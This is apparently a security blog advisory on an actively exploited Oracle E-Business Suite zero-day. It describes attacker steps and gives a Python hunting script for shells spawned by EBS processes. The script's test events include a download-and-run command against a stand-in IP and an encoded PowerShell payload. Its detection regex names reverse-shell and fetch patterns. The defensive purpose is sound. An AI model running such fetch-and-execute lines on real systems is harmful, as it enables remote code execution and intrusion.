
CODE RED • NCSC CRITICAL WARNING
NCSC CRITICAL WARNING: Oracle E-Business Suite 0-Day Actively Exploited in the Wild
By CyberDudeBivash • October 06, 2025 • Urgent Security Directive
cyberdudebivash.com | cyberbivash.blogspot.com
Disclosure: This is an urgent security advisory for enterprise IT and security leaders. It contains affiliate links to relevant security solutions. Your support helps fund our independent research.
Emergency Guide: Table of Contents
- Chapter 1: The Alarm Bells Are Ringing — The NCSC Issues Critical Warning
- Chapter 2: The Attacker’s Playbook — From Exploit to Enterprise Compromise
- Chapter 3: The NCSC’s Directive — An Immediate Containment and Hunting Plan
- Chapter 4: The Strategic Imperative — Defending Tier-0 Assets
Chapter 1: The Alarm Bells Are Ringing — The NCSC Issues Critical Warning
The UK’s National Cyber Security Centre (NCSC) has issued a critical alert regarding active, in-the-wild exploitation of a new, unpatched zero-day vulnerability in Oracle E-Business Suite (EBS). An alert at this level means the NCSC, together with its international partners, has concrete intelligence that threat actors are successfully compromising organizations through this flaw, which we have been tracking as **CVE-2025-22998**.
As we warned when the **public PoC was released**, any unpatched, internet-facing EBS instance is at extreme risk. This NCSC alert confirms that the risk is no longer theoretical; it is an active, ongoing campaign.
Chapter 2: The Attacker’s Playbook — From Exploit to Enterprise Compromise
The goal of the attackers is a full takeover of your enterprise’s “crown jewel” data. The TTPs are consistent with elite data extortion groups like **Cl0p** and nation-state espionage actors.
- **Exploitation:** The attacker uses the unauthenticated RCE to gain an initial foothold on the EBS server.
- **Payload Deployment:** They deploy a stealthy backdoor, such as a webshell or an in-memory implant, to establish persistent access.
- **Credential Dumping:** They harvest credentials from the compromised host. On a Windows-based Forms or application tier that means tools like Mimikatz against LSASS memory; on the far more common Linux application tier it means the APPS schema and database credentials stored in the application-tier configuration files, SSH keys, and any cached domain credentials. The goal in either case is a Domain Administrator or equivalent account.
- **Lateral Movement:** Using the stolen credentials, they pivot from the EBS server to the core of the network, most notably the Domain Controllers.
- **Data Exfiltration/Ransomware:** The attacker achieves their final objective: exfiltrating the entire contents of the ERP database for extortion, or deploying ransomware across the entire enterprise.
Chapter 3: The NCSC’s Directive — An Immediate Containment and Hunting Plan
With no patch available at the time of writing, the official guidance is focused on containment and detection. You must act now.
1. IMMEDIATE NETWORK CONTAINMENT
Removing internet exposure is the single most effective way to stop the initial access stage. Your Oracle EBS web and Forms interface ports **must not be reachable from the public internet.** Use your perimeter firewall or WAF to block all access from untrusted networks now; where partners or remote users genuinely need access, put it behind a VPN or a tight source-IP allow-list rather than leaving the login pages open. Containment does not undo an intrusion that has already happened, which is why the hunt in step 2 must run in parallel.
2. HUNT FOR COMPROMISE (Assume Breach)
You must assume your systems have been targeted. The NCSC urges all EBS customers to begin proactive threat hunting immediately. The highest-fidelity indicator is an EBS application-tier process spawning a shell: the WebLogic JVMs that host oacore and Forms, the Apache httpd front end and the frmweb/frmweb.exe Forms runtime have no business launching cmd.exe, PowerShell or a Unix shell. The pseudo-query below expresses that rule; the parent names in it are placeholders, so replace them with the actual process names in your EBS tier (confirm them from the EDR’s process inventory or `ps -u applmgr`, applmgr being the conventional EBS application owner) and translate the syntax into your EDR’s query language. Leave the concurrent manager (FNDLIBR) out of the parent list, because it legitimately runs host-type concurrent programs through a shell, and baseline it separately.
ParentProcess IN ('ebs_process', 'ias_process', 'frmweb.exe') AND ProcessName IN ('cmd.exe', 'powershell.exe', '/bin/bash', '/bin/sh')
3. MONITOR FOR A PATCH
Continuously monitor Oracle’s official security advisories (Security Alerts and Critical Patch Updates) for an emergency patch, and have a tested change window ready so it can be deployed the moment it is released. Patching a server that has already been backdoored does not evict the attacker, so the hunt in step 2 has to be completed as well.
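The hunting step above, worked as an added example that is not code from the original post, the NCSC or Oracle: a Python script that applies the parent-to-child rule from step 2 to process-creation telemetry, and additionally flags child command lines that look like stage-2 payload deployment (remote fetch, base64 decode, encoded PowerShell, reverse shells). Everything environment-specific is an assumption: the JSON field names (ts, host, user, pid, parent_name, parent_cmdline, name, cmdline), the parent process set (WebLogic `java`, `httpd`, `frmweb`/`frmweb.exe`), the `-Dweblogic.Name` marker, the `/u01/oracle` paths, the `applmgr` user, and the six sample events, which are constructed, not captured.

```python
"""Hunt for shell spawns from the Oracle EBS application tier.

Added example, not code from the original post, the NCSC or Oracle. It
implements step 2 of the containment plan (the "core process spawns a shell"
indicator) over process-creation events exported as JSON lines. The field
names (ts, host, user, pid, parent_name, parent_cmdline, name, cmdline) are
assumptions; map them to whatever your EDR, Sysmon or auditd pipeline emits.
"""
import json
import re
from typing import Iterable

# Parent processes of the EBS web/forms tier. Assumption: a typical R12.2
# install, i.e. WebLogic JVMs hosting oacore/forms, the Apache httpd front
# end, and the Forms runtime (frmweb on Linux, frmweb.exe on Windows).
# The concurrent manager (FNDLIBR) is deliberately NOT here: it runs
# registered host-type concurrent programs through a shell legitimately,
# so it needs its own baseline-driven hunt rather than this rule.
EBS_PARENTS = {"java", "httpd", "frmweb", "frmweb.exe"}
SHELLS = {"sh", "bash", "dash", "ksh", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}

# Crude command-line heuristics for stage-2 (payload deployment) activity.
SUSPICIOUS_CMD = re.compile(
    r"(?:curl|wget)\s+[^\n]*https?://"   # fetch a second stage
    r"|base64\s+(?:-d|--decode)"         # decode-and-run staging
    r"|/dev/tcp/"                        # bash reverse shell
    r"|-EncodedCommand|-enc\s"           # PowerShell encoded payload
    r"|\bnc\b[^\n]*\s-e\s"               # netcat with exec
    r"|\bbash\s+-i\b",                   # interactive bash
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Executable name from a POSIX or Windows path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_ebs_parent(name: str, cmdline: str) -> bool:
    """True when the parent is one of the EBS tier processes above."""
    n = basename(name)
    if n not in EBS_PARENTS:
        return False
    if n == "java":
        # Assumption: the WebLogic managed-server JVM carries the server name
        # (-Dweblogic.Name=...) on its command line; ignore every other JVM.
        return "weblogic" in cmdline.lower()
    return True


def classify(ev: dict) -> list:
    """Return the reasons an event is suspicious; an empty list is a miss."""
    reasons = []
    if not is_ebs_parent(ev.get("parent_name", ""), ev.get("parent_cmdline", "")):
        return reasons
    child = basename(ev.get("name", ""))
    if child in SHELLS:
        reasons.append(f"{basename(ev['parent_name'])} spawned shell {child}")
    if SUSPICIOUS_CMD.search(ev.get("cmdline", "")):
        reasons.append("child command line matches download/decode/reverse-shell pattern")
    return reasons


def hunt(lines: Iterable[str]) -> list:
    """Parse JSON-lines process events and return the flagged ones."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = classify(ev)
        if reasons:
            hit = {k: ev.get(k) for k in ("ts", "host", "user", "pid", "cmdline")}
            hit["reasons"] = reasons
            hits.append(hit)
    return hits


# Constructed sample telemetry (not real data). Paths follow a conventional
# /u01/oracle layout and the applmgr OS user; adjust to your environment.
SAMPLE_EVENTS = [
    {"ts": "2025-10-06T02:14:07Z", "host": "ebs-app1", "user": "applmgr", "pid": 41233,
     "parent_name": "/u01/oracle/jdk/bin/java",
     "parent_cmdline": "java -Dweblogic.Name=oacore_server1 weblogic.Server",
     "name": "/bin/bash", "cmdline": 'bash -c "curl -s http://198.51.100.7/a.sh | sh"'},
    {"ts": "2025-10-06T02:14:09Z", "host": "ebs-app1", "user": "applmgr", "pid": 41240,
     "parent_name": "/u01/oracle/apache/bin/httpd", "parent_cmdline": "httpd -k start",
     "name": "/bin/sh", "cmdline": "sh -c id"},
    {"ts": "2025-10-06T02:15:00Z", "host": "ebs-app1", "user": "applmgr", "pid": 41301,
     "parent_name": "/u01/oracle/apps/bin/FNDLIBR", "parent_cmdline": "FNDLIBR FND CPMGR",
     "name": "/bin/sh", "cmdline": "sh /u01/oracle/apps/custom/bin/nightly_load.sh"},
    {"ts": "2025-10-06T02:15:30Z", "host": "ebs-app1", "user": "applmgr", "pid": 41350,
     "parent_name": "/u01/oracle/jdk/bin/java",
     "parent_cmdline": "java -Dweblogic.Name=oacore_server1 weblogic.Server",
     "name": "/usr/bin/hostname", "cmdline": "hostname"},
    {"ts": "2025-10-06T02:16:02Z", "host": "ebs-app1", "user": "oracle", "pid": 41377,
     "parent_name": "/usr/sbin/sshd", "parent_cmdline": "sshd: oracle [priv]",
     "name": "/bin/bash", "cmdline": "-bash"},
    {"ts": "2025-10-06T02:17:45Z", "host": "ebs-forms-win1", "user": "SVC_EBS", "pid": 5120,
     "parent_name": "C:\\Oracle\\Middleware\\bin\\frmweb.exe",
     "parent_cmdline": "frmweb.exe server",
     "name": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for h in hunt(SAMPLE_LINES):
        print(f"{h['ts']} {h['host']} pid={h['pid']} user={h['user']}: {'; '.join(h['reasons'])}")
```

Run against the constructed sample it flags three events: the oacore JVM spawning bash to pipe a remote script into sh, httpd spawning sh, and the Windows Forms runtime spawning cmd.exe with an encoded PowerShell payload. The FNDLIBR shell, the admin's SSH login shell and the harmless `hostname` child are not flagged, which is the point of keying on the web/forms parents rather than on every shell on the box; feed it your real export one JSON object per line and treat every hit as a live incident until proven otherwise.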
Chapter 4: The Strategic Imperative — Defending Tier-0 Assets
An NCSC alert for an actively exploited zero-day in your core ERP system is a board-level issue. It is the ultimate test of your security program’s resilience. A strategy that relies purely on preventative controls has already failed. Your ability to survive this event depends entirely on your **detection and response** capabilities.
This incident is the ultimate justification for investing in a mature, proactive security operation built on a **Zero Trust** architecture and powered by an **XDR platform**. Can you see what an attacker does *after* they bypass your firewall? Can you contain their lateral movement? These are the questions that determine survival.
Detect the Post-Exploitation Phase: An XDR platform is your essential safety net for post-breach investigation. A solution like **Kaspersky’s XDR** provides the deep behavioral visibility needed to detect the attacker’s TTPs—credential dumping, lateral movement, and data exfiltration—before they can achieve their final objective.
About the Author
CyberDudeBivash is a cybersecurity strategist with 15+ years in enterprise application security, incident response, and threat intelligence, advising CISOs of Fortune 500 companies across APAC. [Last Updated: October 06, 2025]
#CyberDudeBivash #Oracle #EBS #ZeroDay #RCE #CVE #CyberSecurity #NCSC #ThreatIntel #InfoSec #IncidentResponse